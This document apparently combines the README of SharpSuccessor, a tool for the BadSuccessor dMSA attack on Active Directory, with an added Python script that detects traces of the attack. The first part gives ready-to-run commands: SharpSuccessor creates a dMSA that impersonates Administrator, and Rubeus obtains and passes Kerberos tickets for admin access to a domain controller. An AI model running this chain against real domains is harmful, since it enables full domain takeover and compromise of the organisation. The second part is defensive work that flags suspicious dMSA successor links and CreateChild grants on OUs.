SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon's (@YuG0rd) BadSuccessor attack from Akamai. A low-privilege user who holds CreateChild permission on any Organizational Unit (OU) in the Active Directory domain, together with write access on a target object, can perform account takeover.
Use SharpSuccessor to add and weaponize the dMSA object, as well as write the proper attributes on the target account you wish to impersonate:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA
Request a TGT as the current user context, in this case jdoe:
Rubeus.exe tgtdeleg /nowrap
Then use that TGT to impersonate the dMSA account:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....
Now you can request a service ticket with Administrator context for any SPN, including the Domain Controllers, for post-exploitation. For example, here I will show admin access over SMB on the domain controller:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...
Now that we have the ticket in memory, we can test access:
Massive thanks to Jim Sykora and Garrett Foster for the inspirations and assistance for this tool!
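The walkthrough above leaves two artifacts in the directory that a defender can look for: a dMSA object whose msDS-ManagedAccountPrecededByLink points at a privileged account, and an OU ACE granting CreateChild to an ordinary user (the precondition named in the first paragraph). The script below is an added example, not part of SharpSuccessor; it runs both checks over constructed sample records shaped like a normalised LDAP export. The schema names (msDS-DelegatedManagedServiceAccount, msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState) are the documented AD attribute names; the record layout, DNs, principals and allow-lists are assumptions for the example.

```python
"""Added example (not SharpSuccessor's code): detect BadSuccessor-style dMSA
takeover state in Active Directory from the defender's side.

Check 1: dMSA objects whose msDS-ManagedAccountPrecededByLink points at a
         privileged account (the successor link the attack writes).
Check 2: OU ACEs granting CreateChild (or GenericAll, which implies it) to a
         principal outside an allow-list.

Schema names are the documented AD ones; every record below is constructed.
"""
from dataclasses import dataclass

DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
PRECEDED_BY = "msDS-ManagedAccountPrecededByLink"
MSA_STATE = "msDS-DelegatedMSAState"
MIGRATION_COMPLETED = 2  # documented value: migration completed
CREATE_CAPABLE_RIGHTS = {"CreateChild", "GenericAll"}

# Constructed sample data (hypothetical lab.lan domain from the walkthrough).
PRIVILEGED_DNS = {
    "CN=Administrator,CN=Users,DC=lab,DC=lan",
    "CN=krbtgt,CN=Users,DC=lab,DC=lan",
}
ALLOWED_OU_CREATORS = {"LAB\\Domain Admins", "LAB\\Enterprise Admins", "NT AUTHORITY\\SYSTEM"}

SAMPLE_OBJECTS = [
    {   # looks like the object the walkthrough creates
        "dn": "CN=attacker_dMSA,OU=test,DC=lab,DC=lan",
        "objectClass": ["top", "msDS-GroupManagedServiceAccount", DMSA_CLASS],
        PRECEDED_BY: "cn=administrator,cn=users,dc=lab,dc=lan",
        MSA_STATE: MIGRATION_COMPLETED,
    },
    {   # a legitimate migration: link points at an ordinary service account
        "dn": "CN=svc_web,OU=Service Accounts,DC=lab,DC=lan",
        "objectClass": ["top", "msDS-GroupManagedServiceAccount", DMSA_CLASS],
        PRECEDED_BY: "CN=svc_web_old,OU=Service Accounts,DC=lab,DC=lan",
        MSA_STATE: MIGRATION_COMPLETED,
    },
    {   # a plain user; never a dMSA, ignored by check 1
        "dn": "CN=jdoe,CN=Users,DC=lab,DC=lan",
        "objectClass": ["top", "person", "user"],
    },
]

SAMPLE_OU_ACES = [
    {"ou": "OU=test,DC=lab,DC=lan", "principal": "LAB\\jdoe", "rights": ["CreateChild"]},
    {"ou": "OU=test,DC=lab,DC=lan", "principal": "LAB\\Domain Admins", "rights": ["GenericAll"]},
    {"ou": "OU=Servers,DC=lab,DC=lan", "principal": "LAB\\helpdesk", "rights": ["ReadProperty"]},
]


@dataclass(frozen=True)
class Finding:
    kind: str
    subject: str
    detail: str


def _norm_dn(dn: str) -> str:
    """DNs are case-insensitive; normalise before comparing."""
    return ",".join(part.strip() for part in dn.split(",")).lower()


def find_suspicious_dmsa(objects, privileged_dns):
    """Check 1: dMSAs whose predecessor link names a privileged account."""
    privileged = {_norm_dn(d) for d in privileged_dns}
    findings = []
    for obj in objects:
        classes = {c.lower() for c in obj.get("objectClass", [])}
        if DMSA_CLASS.lower() not in classes:
            continue
        link = obj.get(PRECEDED_BY)
        if link and _norm_dn(link) in privileged:
            state = obj.get(MSA_STATE)
            findings.append(Finding(
                "dmsa_succeeds_privileged_account", obj["dn"],
                f"{PRECEDED_BY}={link}; {MSA_STATE}={state}"
                + (" (migration completed)" if state == MIGRATION_COMPLETED else ""),
            ))
    return findings


def find_risky_ou_aces(aces, allowed_principals):
    """Check 2: non-allow-listed principals able to create children in an OU."""
    allowed = {p.lower() for p in allowed_principals}
    return [
        Finding("createchild_on_ou", ace["principal"], ace["ou"])
        for ace in aces
        if ace["principal"].lower() not in allowed
        and set(ace["rights"]) & CREATE_CAPABLE_RIGHTS
    ]


def run_checks():
    """Run both checks over the constructed samples; returns (dmsa, ace) findings."""
    return (find_suspicious_dmsa(SAMPLE_OBJECTS, PRIVILEGED_DNS),
            find_risky_ou_aces(SAMPLE_OU_ACES, ALLOWED_OU_CREATORS))


if __name__ == "__main__":
    for finding in (f for group in run_checks() for f in group):
        print(f"[{finding.kind}] {finding.subject}: {finding.detail}")
```

Against the constructed records this reports exactly the two artifacts the walkthrough would leave: attacker_dMSA succeeding Administrator, and jdoe holding CreateChild on OU=test. In a real environment the input would come from an LDAP search for objectClass=msDS-DelegatedManagedServiceAccount and from the DACLs of each OU; the privileged set is best built from adminCount=1 objects and protected-group membership rather than a hand-written list.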